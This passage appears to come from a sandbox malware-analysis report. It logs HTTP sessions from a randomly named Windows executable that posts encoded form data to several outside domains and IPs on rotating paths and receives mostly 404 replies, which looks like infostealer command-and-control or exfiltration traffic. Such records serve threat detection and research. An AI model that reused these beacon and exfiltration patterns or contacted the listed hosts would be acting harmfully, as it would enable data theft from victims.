31	192.168.2.4	50040	3.33.130.190	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:26.059237003 CET	10886	OUT	POST /jpec/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.mythkitchen.net Origin: http://www.mythkitchen.net Referer: http://www.mythkitchen.net/jpec/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 4b 39 53 6b 62 61 66 45 6f 62 49 36 4f 6a 75 53 4d 6d 31 77 6b 5a 6c 56 69 69 57 64 67 65 4d 34 36 35 47 58 61 72 69 4e 6e 49 49 63 54 38 76 39 4b 79 2f 64 6e 2f 6f 53 6b 38 6b 61 43 77 6e 50 76 6b 6f 5a 39 58 77 4a 30 64 4e 6a 57 59 55 6c 4a 37 6e 57 4c 65 75 66 49 57 6d 4a 56 2b 7a 79 67 78 4b 4d 2f 33 77 37 47 76 58 74 69 49 42 66 4a 53 6e 4f 35 44 62 59 30 4a 36 38 32 59 4a 78 63 30 57 79 79 44 4d 4f 67 4c 68 67 52 71 2b 55 64 59 56 53 42 56 79 5a 72 2f 39 52 46 74 6b 54 6c 61 79 43 45 33 59 2f 43 2f 4a 41 43 72 50 39 76 36 6e 55 77 67 63 6d 2f 6d 30 79 35 64 44 73 58 77 64 75 35 49 69 58 62 53 64 62 56 49 64 4e 42 6b 35 6a 56 34 32 4c 75 6a 78 6f 39 4a 46 45 30 69 66 78 59 30 59 75 34 68 31 35 45 71 5a 38 79 45 4c 78 56 6c 63 4d 5a 6e 6a 35 4b 75 51 4e 69 77 64 54 65 68 51 48 38 33 54 48 49 48 7a 4c 70 39 37 32 2b 58 4c 6c 65 55 49 53 31 65 79 53 53 6e 41 4e 59 47 52 79 49 2f 2b 33 54 6f 47 43 69 4d 49 59 6f 70 75 67 32 6c 43 63 65 41 63 6d 79 30 2f 31 64 56 49 6b 4c 77 7a 54 [TRUNCATED] Data Ascii: fZah6=K9SkbafEobI6OjuSMm1wkZlViiWdgeM465GXariNnIIcT8v9Ky/dn/oSk8kaCwnPvkoZ9XwJ0dNjWYUlJ7nWLeufIWmJV+zygxKM/3w7GvXtiIBfJSnO5DbY0J682YJxc0WyyDMOgLhgRq+UdYVSBVyZr/9RFtkTlayCE3Y/C/JACrP9v6nUwgcm/m0y5dDsXwdu5IiXbSdbVIdNBk5jV42Lujxo9JFE0ifxY0Yu4h15EqZ8yELxVlcMZnj5KuQNiwdTehQH83THIHzLp972+XLleUIS1eySSnANYGRyI/+3ToGCiMIYopug2lCceAcmy0/1dVIkLwzTz0WDz8kukcLTCwZnAEI8PPDu0KtWuvdK9eF7qOEP5b5cMPEHh7FZYPUe+HW6DQGw3JeN0i849elmy9KBycGGkLL9eI/DsPMGOPhwI4rmWHaoznurZIndfPHKEZqbSnkVVY2P2Q0Kn7LRXlS1RGTEGnFQcu7vd+8IfITFHquOkYbzXtlqahFr4ikSMefKu/msaykNP480/GHE5b9Zq266vZeQxznQM7VtBHCrENXMntKmeVEpTwBSq1MJoH01QTcyIGTy+cX1c17BpB6EOV81ehZGwVgxUO2WYXxFBfOPKktY7dr3zhk1xPUFIVmRAAIy/XYEuzWW3pdOhG6AlH2Pfv1awJsI3MV/E1Xb7lOxayURCL9R2udZILYRkUY8U68KVAYtaj0ihWRvb7We8OFLuo6CPeml8XNITJX8UUooah4x7EbbRUSxgkwV34O/V7iIO4heWychBRxJ2aEdVD3i6AMiCEWAv5idkUildlV1wnKIyMGoaawNnidujDdh+5YqU/pI2LFhhe7Zqcbc9PYHt330+tRZ1aJ4BtsxVoWP+cRteG9TIs2Eu4qdJ7tU9QzJo9K+bfgIVXBsbZA9inDbOAwVGJihBD6a6rKxrYdLCiJz9nFBzoONUWj2l1fATcVFN5ITD7TdV1VCqVB8sEf/40PjVfX1Ig1kgH [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50041	3.33.130.190	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:28.609059095 CET	524	OUT	GET /jpec/?42T8f=ABwh0lAHdJnXMBd&fZah6=H/6EYszByJpADA+WA3Vqt418sGn9uf8tg+SGSp7tj40HLMf8PQbgyfoSnaQ4KyKmnn8a8l03/u5+bfBufpbeP/ygRn3ZetvVjymO339MDPXXlNpwByLpzyY= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.mythkitchen.net User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:52:29.031080008 CET	403	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 05:52:28 GMT Content-Type: text/html Content-Length: 263 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 32 54 38 66 3d 41 42 77 68 30 6c 41 48 64 4a 6e 58 4d 42 64 26 66 5a 61 68 36 3d 48 2f 36 45 59 73 7a 42 79 4a 70 41 44 41 2b 57 41 33 56 71 74 34 31 38 73 47 6e 39 75 66 38 74 67 2b 53 47 53 70 37 74 6a 34 30 48 4c 4d 66 38 50 51 62 67 79 66 6f 53 6e 61 51 34 4b 79 4b 6d 6e 6e 38 61 38 6c 30 33 2f 75 35 2b 62 66 42 75 66 70 62 65 50 2f 79 67 52 6e 33 5a 65 74 76 56 6a 79 6d 4f 33 33 39 4d 44 50 58 58 6c 4e 70 77 42 79 4c 70 7a 79 59 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?42T8f=ABwh0lAHdJnXMBd&fZah6=H/6EYszByJpADA+WA3Vqt418sGn9uf8tg+SGSp7tj40HLMf8PQbgyfoSnaQ4KyKmnn8a8l03/u5+bfBufpbeP/ygRn3ZetvVjymO339MDPXXlNpwByLpzyY="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50042	154.23.184.141	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:34.441724062 CET	766	OUT	POST /cisl/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.36ded.top Origin: http://www.36ded.top Referer: http://www.36ded.top/cisl/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 6f 55 7a 44 63 55 67 6d 52 35 6b 56 49 49 66 62 32 33 41 7a 4a 75 58 79 49 43 4e 6c 33 76 39 45 30 59 49 51 7a 47 6f 4f 4f 46 41 79 4b 4a 69 2f 66 41 4e 33 58 4e 49 43 73 39 75 47 4c 4b 33 61 51 35 78 58 59 6f 41 52 39 6a 64 65 38 66 71 51 78 4c 4c 4b 52 54 59 45 65 7a 6a 59 63 54 41 30 63 76 57 50 49 65 52 76 65 45 6d 4c 77 36 66 4d 7a 6f 75 2b 58 47 6b 45 71 62 31 47 38 42 36 6d 6b 49 51 4b 38 37 78 2f 41 31 50 52 55 64 64 6e 49 4d 66 31 6f 54 35 4d 4f 48 4f 51 37 76 33 78 70 62 72 48 79 34 65 35 49 52 55 4f 47 39 30 76 4d 53 68 69 35 47 51 4b 67 4d 5a 35 6b 7a 75 2f 39 51 3d 3d Data Ascii: fZah6=oUzDcUgmR5kVIIfb23AzJuXyICNl3v9E0YIQzGoOOFAyKJi/fAN3XNICs9uGLK3aQ5xXYoAR9jde8fqQxLLKRTYEezjYcTA0cvWPIeRveEmLw6fMzou+XGkEqb1G8B6mkIQK87x/A1PRUddnIMf1oT5MOHOQ7v3xpbrHy4e5IRUOG90vMShi5GQKgMZ5kzu/9Q==
Nov 11, 2024 06:52:35.241013050 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:52:35 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66acf18b-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50043	154.23.184.141	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:36.990942001 CET	786	OUT	POST /cisl/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.36ded.top Origin: http://www.36ded.top Referer: http://www.36ded.top/cisl/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 6f 55 7a 44 63 55 67 6d 52 35 6b 56 4b 6f 76 62 33 57 41 7a 4c 4f 58 31 52 69 4e 6c 39 50 39 41 30 5a 30 51 7a 48 73 65 4f 77 59 79 4c 73 65 2f 46 43 6c 33 57 4e 49 43 34 74 75 48 45 71 33 42 51 35 38 30 59 70 38 52 39 6e 31 65 38 65 61 51 78 61 4c 4a 58 44 59 61 53 54 6a 65 42 44 41 30 63 76 57 50 49 65 45 4b 65 45 75 4c 78 4c 76 4d 78 4d 43 35 4a 57 6b 44 74 62 31 47 71 78 36 63 6b 49 51 34 38 36 63 51 41 33 48 52 55 66 46 6e 50 64 65 48 6e 54 35 43 57 6e 50 50 36 64 79 65 73 49 53 34 78 65 4b 41 47 78 55 73 48 37 35 31 64 6a 41 31 72 47 30 35 39 4c 51 4e 70 77 54 32 6d 66 79 6a 36 33 74 37 6d 68 4a 37 4a 58 65 51 6e 52 67 57 67 49 63 3d Data Ascii: fZah6=oUzDcUgmR5kVKovb3WAzLOX1RiNl9P9A0Z0QzHseOwYyLse/FCl3WNIC4tuHEq3BQ580Yp8R9n1e8eaQxaLJXDYaSTjeBDA0cvWPIeEKeEuLxLvMxMC5JWkDtb1Gqx6ckIQ486cQA3HRUfFnPdeHnT5CWnPP6dyesIS4xeKAGxUsH751djA1rG059LQNpwT2mfyj63t7mhJ7JXeQnRgWgIc=
Nov 11, 2024 06:52:37.791125059 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:52:37 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66acf18b-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50044	154.23.184.141	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:39.537764072 CET	10868	OUT	POST /cisl/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.36ded.top Origin: http://www.36ded.top Referer: http://www.36ded.top/cisl/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 6f 55 7a 44 63 55 67 6d 52 35 6b 56 4b 6f 76 62 33 57 41 7a 4c 4f 58 31 52 69 4e 6c 39 50 39 41 30 5a 30 51 7a 48 73 65 4f 77 51 79 4b 61 71 2f 66 6a 6c 33 56 4e 49 43 6b 64 75 4b 45 71 32 42 51 36 4d 6f 59 70 77 76 39 68 78 65 36 38 53 51 67 34 7a 4a 65 44 59 61 49 7a 6a 66 63 54 41 68 63 76 47 4c 49 65 55 4b 65 45 75 4c 78 49 48 4d 2f 49 75 35 4c 57 6b 45 71 62 31 77 38 42 37 53 6b 49 49 43 38 36 70 76 42 48 6e 52 52 50 56 6e 4b 76 32 48 71 54 35 41 44 6e 50 48 36 63 4f 42 73 49 50 4c 78 65 57 6d 47 7a 49 73 46 76 59 45 61 53 45 4e 33 56 4d 32 72 70 63 46 6d 78 72 73 71 76 43 76 33 55 30 69 39 44 51 52 4a 56 4b 64 36 52 41 7a 37 64 4d 73 6c 49 33 75 41 4a 61 64 4c 59 49 76 57 36 36 4d 50 58 67 33 4d 71 6f 72 4f 47 52 70 42 2b 63 46 52 66 64 6b 57 33 35 58 53 6d 5a 4e 54 61 30 74 68 43 33 63 53 34 57 73 31 6e 35 65 5a 55 75 33 4f 72 61 70 48 55 58 39 32 50 38 52 64 2f 47 33 78 77 6c 67 4c 4a 59 44 42 6b 42 51 6e 67 55 58 68 54 56 78 31 45 49 77 7a 78 67 79 36 53 2b 72 74 4e 39 56 [TRUNCATED] Data Ascii: fZah6=oUzDcUgmR5kVKovb3WAzLOX1RiNl9P9A0Z0QzHseOwQyKaq/fjl3VNICkduKEq2BQ6MoYpwv9hxe68SQg4zJeDYaIzjfcTAhcvGLIeUKeEuLxIHM/Iu5LWkEqb1w8B7SkIIC86pvBHnRRPVnKv2HqT5ADnPH6cOBsIPLxeWmGzIsFvYEaSEN3VM2rpcFmxrsqvCv3U0i9DQRJVKd6RAz7dMslI3uAJadLYIvW66MPXg3MqorOGRpB+cFRfdkW35XSmZNTa0thC3cS4Ws1n5eZUu3OrapHUX92P8Rd/G3xwlgLJYDBkBQngUXhTVx1EIwzxgy6S+rtN9V+71yjTzuFvxMNZjFjBGdwKeUca552yxZD6iWhdPVggpHQaI3TowS9JqJtK/RoDmrvA8IR5VFCS/tyo3rudqsoJqK42O67RDmwbK/J8apCYP+KNoSKfbmWJ96i/acQYGE+/SFPqGlUnluGExV68e2+DIjSVn+kOSXEPG+eC9EVZbAMHlKR5KE34t2MjVt6J3UB6tULHCOZiU+vdCiOtLQE4fh++UdZtZltm26SawGIHCyJ4CDwmEp09sLMpOpZ6uMYdMsYaGOzS7mcxbGmQGVxOWsJvewTCL3bTQ8mPr/2Tvn/SJ5iUd47haMg+dTqu4OLHX9wWUtPShz1kgRB+Vb3igOl13a91gARJuEvLT0bhK51SZ2vd38p1hrB8G3yLVbFn0X3V07oNYIjYuZqN0q7p89THA1eyavZunnCsNWZ3Ynk4WmdVQ89I+l3cgw/TXOo7FyisHwpVPm8oGykknNBzhtvDTtDPTrsa54sC6FXYw1tyi4oUg3HaFTLKLSe5rW9/kmxJy321JvyoZg9TPlWQX9iRc8tcmW7/dsnvdta44eOdzkzWadHoWe/MynRUCoeTUQ2J7gUdnlYt+PGEBxpBJygh0IY3D8Eu10/qzEUPT807YhuZgbXaZpytO1yzvYj/H4muzAO54XD/O9BKJDEcJd5SlD38saCx [TRUNCATED]
Nov 11, 2024 06:52:40.342266083 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:52:40 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66acf18b-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50045	154.23.184.141	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:42.092710018 CET	518	OUT	GET /cisl/?fZah6=lWbjfgsSROluEJiB130lMvTTODsRzMpi0/0hjnk2IWgqE7GjKRd2WK82uOKTApKAYp80eLoSkDd+9uj5wYnhWREwRAyCHQcyRtiVUe8dDUuRz//M0PaFelw=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.36ded.top User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:52:42.892115116 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:52:42 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66acf18b-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50046	38.47.233.52	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:48.464549065 CET	766	OUT	POST /4loa/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.2q33e.top Origin: http://www.2q33e.top Referer: http://www.2q33e.top/4loa/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 66 50 51 76 50 46 59 57 68 72 43 54 31 6f 49 37 76 46 6a 57 39 34 6a 6c 4c 4b 43 43 58 53 61 31 31 78 37 5a 62 46 51 67 2f 70 30 66 67 6d 45 72 48 6b 74 4d 35 35 68 44 78 37 68 64 59 79 43 65 51 72 78 51 58 68 2b 67 39 68 2f 68 73 35 67 74 6c 65 63 2b 39 65 66 36 66 4f 53 72 41 56 4e 6a 61 6c 58 62 6f 41 37 63 57 64 51 75 53 73 68 56 7a 53 34 4a 4c 6f 6e 76 6d 6f 74 46 78 7a 43 4a 6b 50 31 6b 6c 48 37 49 6d 36 78 76 61 62 47 74 69 2b 33 6c 46 4c 4b 34 52 4f 73 70 42 39 6e 75 4e 50 6c 6d 38 2f 72 33 63 72 52 75 35 43 78 6f 74 71 74 55 42 47 38 52 44 46 45 4c 45 67 57 51 69 51 3d 3d Data Ascii: fZah6=fPQvPFYWhrCT1oI7vFjW94jlLKCCXSa11x7ZbFQg/p0fgmErHktM55hDx7hdYyCeQrxQXh+g9h/hs5gtlec+9ef6fOSrAVNjalXboA7cWdQuSshVzS4JLonvmotFxzCJkP1klH7Im6xvabGti+3lFLK4ROspB9nuNPlm8/r3crRu5CxotqtUBG8RDFELEgWQiQ==
Nov 11, 2024 06:52:49.262757063 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:52:49 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50047	38.47.233.52	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:51.007641077 CET	786	OUT	POST /4loa/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.2q33e.top Origin: http://www.2q33e.top Referer: http://www.2q33e.top/4loa/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 66 50 51 76 50 46 59 57 68 72 43 54 31 49 34 37 6f 6a 72 57 70 6f 6a 69 56 36 43 43 64 79 62 79 31 78 33 5a 62 45 46 6c 2b 62 51 66 67 48 30 72 56 56 74 4d 34 35 68 44 70 72 67 58 46 69 44 51 51 72 74 69 58 67 43 67 39 68 72 68 73 34 51 74 6c 50 63 2f 37 4f 66 34 4b 65 53 74 64 6c 4e 6a 61 6c 58 62 6f 41 75 35 57 62 34 75 53 64 52 56 69 44 34 4b 43 49 6d 64 77 59 74 46 6e 44 43 4e 6b 50 30 42 6c 47 6e 6d 6d 2f 74 76 61 66 43 74 6a 72 58 6d 4d 4c 4b 2b 63 75 73 2f 51 4f 61 67 50 36 59 55 79 34 58 56 53 4c 41 44 31 6b 38 79 38 62 4d 44 54 47 59 69 65 43 4e 2f 4a 6a 72 5a 35 57 59 54 4e 69 34 6d 56 46 4a 66 71 75 63 6f 70 77 65 4a 2f 6a 63 3d Data Ascii: fZah6=fPQvPFYWhrCT1I47ojrWpojiV6CCdyby1x3ZbEFl+bQfgH0rVVtM45hDprgXFiDQQrtiXgCg9hrhs4QtlPc/7Of4KeStdlNjalXboAu5Wb4uSdRViD4KCImdwYtFnDCNkP0BlGnmm/tvafCtjrXmMLK+cus/QOagP6YUy4XVSLAD1k8y8bMDTGYieCN/JjrZ5WYTNi4mVFJfqucopweJ/jc=
Nov 11, 2024 06:52:51.805752039 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:52:51 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 